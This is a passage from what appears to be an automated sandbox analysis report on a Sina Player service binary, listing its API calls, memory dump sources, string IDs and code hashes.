                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,sina_player_crashes,00000013), ref: 00375DF4
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00375E08
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00375E11
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00375E24
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E44
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E55
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 00375E68
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00375E7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Path@1@@$V01@V01@@$??3@Append@CreateDir@base@@DirectoryExists@base@@PathTempU?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: sina_player_crashes
                                                                                                                                                                                                    • API String ID: 516180890-4205608273
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6C61AF2F
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,00000001,?,?,6C61B3BE,?,?,?,?,00000004,?,00000002,?,?,6C61B606), ref: 6C61AF49
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6C61AF78
                                                                                                                                                                                                      • Part of subcall function 6C60FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6C61F227,00000004), ref: 6C60FFFD
                                                                                                                                                                                                      • Part of subcall function 6C60FFA8: _errno.MSVCR120(?,?,?,6C61F227,00000004), ref: 6C610009
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6C61AFD0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_errno_fdtestfesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3384718034-0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: fd999dceb572c75719a5396b210085305710d75415562c2209fb1ef112bddb38
                                                                                                                                                                                                    • Instruction ID: dd0483614198b12b94cbfed22f8fc39f73558dbb393e3d92dffa7a1c1d23d009
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd999dceb572c75719a5396b210085305710d75415562c2209fb1ef112bddb38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65712C75600B048FCB2ACF29D58455AB7F6FF8A320B518A5ED84B8BB60D775F805CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(00000001,00000001,00000010,FFFFFEFF,?,00000000), ref: 6C5AD947
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6C5AD95D
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6C5AD96C
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD97F
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6C5AD986
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator=$NameName::Name::operator+atol
                                                                                                                                                                                                    • String ID: generic-type-$template-parameter-
                                                                                                                                                                                                    • API String ID: 1861674852-13229604
                                                                                                                                                                                                    • Opcode ID: 3929d9c322ba885f141bf18c74961df2cf6530a42ba14709de64393fcc9d63d0
                                                                                                                                                                                                    • Instruction ID: 03f01ee0e7b632024d281afbdb9ac6f09aa9b4170c551d5f971d354d86b16ed7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3929d9c322ba885f141bf18c74961df2cf6530a42ba14709de64393fcc9d63d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C61AE71E01209EFDF14DFA5DC84AEDB7F8AB59314F10441AE815A7640EB349A49CB68
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00381156
                                                                                                                                                                                                    • ??0RegKey@win@base@@QAE@XZ.BASE ref: 0038117A
                                                                                                                                                                                                    • ?Open@RegKey@win@base@@QAEJPAUHKEY__@@PB_WK@Z.BASE(80000001,Software\Sina\Player\ClientCode,000F003F), ref: 0038119C
                                                                                                                                                                                                    • memset.MSVCR120 ref: 003811B7
                                                                                                                                                                                                    • ?ReadValue@RegKey@win@base@@QBEJPB_WPAXPAK2@Z.BASE(00000000,?,00000208,00000001), ref: 003811DC
                                                                                                                                                                                                    • ?WriteValue@RegKey@win@base@@QAEJPB_WPBXKK@Z.BASE(00000000,003819F5,0039D5F4,00000001), ref: 0038124E
                                                                                                                                                                                                    • ?Create@RegKey@win@base@@QAEJPAUHKEY__@@PB_WK@Z.BASE(80000001,Software\Sina\Player\ClientCode,000F003F), ref: 00381286
                                                                                                                                                                                                    • ?WriteValue@RegKey@win@base@@QAEJPB_WPBXKK@Z.BASE(00000000,003819F5,0039D5F4,00000001), ref: 003812AD
                                                                                                                                                                                                    • ??1RegKey@win@base@@QAE@XZ.BASE ref: 003812C0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Key@win@base@@$Value@$WriteY__@@memset$Create@Open@Read
                                                                                                                                                                                                    • String ID: Software\Sina\Player\ClientCode
                                                                                                                                                                                                    • API String ID: 1512995821-62322717
                                                                                                                                                                                                    • Opcode ID: 0a17b4e095dc784f147a6228e0fd22de1bb53265edee42271cec2929fb3bfe77
                                                                                                                                                                                                    • Instruction ID: 003894313386496f7f0e65d0174a37f451241bcc6e6d98fa7fa676a67828405f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a17b4e095dc784f147a6228e0fd22de1bb53265edee42271cec2929fb3bfe77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC516471A40318ABDF22EF54DD49BE6B7BCFB24710F500699E906E7280E731AA85CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long), ref: 00371B71
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00371BA4
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00371BB5
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 00371BCB
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00371BDB
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?,?,?,?), ref: 00371BED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 00371C03
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00371C0D
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00371C30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1887487913-3788999226
                                                                                                                                                                                                    • Opcode ID: ed0213c7c7fc45b6f73447a2e846c9686330561d7e3d0fef70f3f3934ffd5b11
                                                                                                                                                                                                    • Instruction ID: 94f5a656c86894d4a0d188a2b907f0710a83373114cd06b8637bfa28508bbd74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed0213c7c7fc45b6f73447a2e846c9686330561d7e3d0fef70f3f3934ffd5b11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F41D5B6A002059FCB39DF7CDD8596E77A9EF84310B24867DE85AD3340EA71ED008A90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,?,?), ref: 00379F5C
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F7,?), ref: 00379F72
                                                                                                                                                                                                    • ?CreateFileVersionInfo@FileVersionInfo@@SAPAV1@ABVFilePath@base@@@Z.BASE(?), ref: 00379F87
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,00000000), ref: 00379FB1
                                                                                                                                                                                                      • Part of subcall function 00372760: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372773
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FCF
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FF2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A014
                                                                                                                                                                                                    • ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,?,?), ref: 0037A05A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A073
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • AFFD64EB-27A5-4488-858D-6AC989A56887, xrefs: 0037A098
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Path@base@@Path@base@@@Version$Base64BasicCreateD@2@@std@@D@2@@std@@@D@2@@std@@@1@Encode@base@@F8@base@@Get@Info@Info@@PathPiece@Service@@StringU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide
                                                                                                                                                                                                    • String ID: AFFD64EB-27A5-4488-858D-6AC989A56887
                                                                                                                                                                                                    • API String ID: 1789109476-1517175651
                                                                                                                                                                                                    • Opcode ID: 7b03b5b591af2c43d0d71f269825af1218452fbaed5fffae6f80b88939adb9b7
                                                                                                                                                                                                    • Instruction ID: 954dcf217cf6f86eaf790b0e77205055f636e8908eba4bb6d3c49b9010420aa7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b03b5b591af2c43d0d71f269825af1218452fbaed5fffae6f80b88939adb9b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7451D471D00209DFDF26DFA4C909BEEBBB8FF05314F004169E41AA7280D7395A44CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 6C5779E7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(px[l), ref: 6C5A291E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCEE8,px[l), ref: 6C5A2933
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: __EH_prolog3.LIBCMT ref: 6C574EBA
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: ??2@YAPAXI@Z.MSVCR120(000000D0), ref: 6C574ED9
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: free.MSVCR120(00000000), ref: 6C574EFC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CriticalExceptionH_prolog3LeaveSectionThrowfreestd::exception::exception
                                                                                                                                                                                                    • String ID: pScheduler$px[l
                                                                                                                                                                                                    • API String ID: 2663953338-1422803105
                                                                                                                                                                                                    • Opcode ID: e15071452756b89519f068b73959255ea71326715932f74211d4de82100a773b
                                                                                                                                                                                                    • Instruction ID: 5fa220628e530475ab04d24645d2cbabcf1baa0dc7bd5b19ff287446bf58a355
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e15071452756b89519f068b73959255ea71326715932f74211d4de82100a773b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81419D70601209EFCB15CF67CC86AADBBB4FF05348F10852AE8199BA50D730E995CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D300
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D325
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D342
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0038A2A3
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionLockit@std@@Throw$??0_??0bad_cast@std@@??1_Bid@locale@std@@Facet_Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 3850036058-3145022300
                                                                                                                                                                                                    • Opcode ID: 051b82ad9f8a489f1404f1fe3a7d0d7a2b6776dafd2fa271d49a0ec46f7a9aa5
                                                                                                                                                                                                    • Instruction ID: 24546758646445f4499c198847f49969630d693975bf94a015198508bc03f12a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 051b82ad9f8a489f1404f1fe3a7d0d7a2b6776dafd2fa271d49a0ec46f7a9aa5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0531BF76A00614DFDB12EFA4DC49BAEB7B8FF09720F054596E811A73A1D771AD00CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00380711,?,00000000,8285FFAB,?,00000001), ref: 0038725F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0038726D
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 0038729C
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000076,00000001), ref: 003872B6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,00000026), ref: 003872E1
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000026), ref: 003872F9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message@logging@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastLevel@logging@@ReadU?$char_traits@V01@
                                                                                                                                                                                                    • String ID: &$ReadFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 493541695-1956146570
                                                                                                                                                                                                    • Opcode ID: 5660fa04ef609c8953754b9dc47e9302bb5da36bef9d0f91058693053d0732ba
                                                                                                                                                                                                    • Instruction ID: 81ef397f4a1b296abccf10c7ee19cba4c5fe7a75a34c04a279d6a42d669dcc7a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5660fa04ef609c8953754b9dc47e9302bb5da36bef9d0f91058693053d0732ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61317172E04208AFDB25DF94DD46BEEB7B8FB08750F10456BF915E2280E7369A048B50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: operator+
                                                                                                                                                                                                    • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                                                                                                                                    • API String ID: 3839230940-456688812
                                                                                                                                                                                                    • Opcode ID: d84be39d48f35dd978944af32555e630100b124d6fe5b5b7f1a9403822c7bfbf
                                                                                                                                                                                                    • Instruction ID: 8b267c698d86252db60cc1867654f9706106cd861b621a82dc16329bdfbee1af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d84be39d48f35dd978944af32555e630100b124d6fe5b5b7f1a9403822c7bfbf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A219F31906259EFDF10DF94CC80FEE3BB9EB85359F108456F9189BA50E731A985CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C576958
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000028,0000002C,6C5769D2,?,00000000,?,?,?,6C573D6E,6C5648CA,00000000,0000000C,6C573E4B,?,00000000,?), ref: 6C576961
                                                                                                                                                                                                      • Part of subcall function 6C55EE11: malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,6C630674,00000028,0000002C,6C5769D2,?,00000000,?,?,?,6C573D6E,6C5648CA,00000000,0000000C,6C573E4B,?), ref: 6C57697B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001), ref: 6C576990
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001), ref: 6C57699B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6C5A336F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5B76B4,6C62D0A4), ref: 6C5A3384
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,6C5B76B4,6C62D0A4), ref: 6C5A33A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
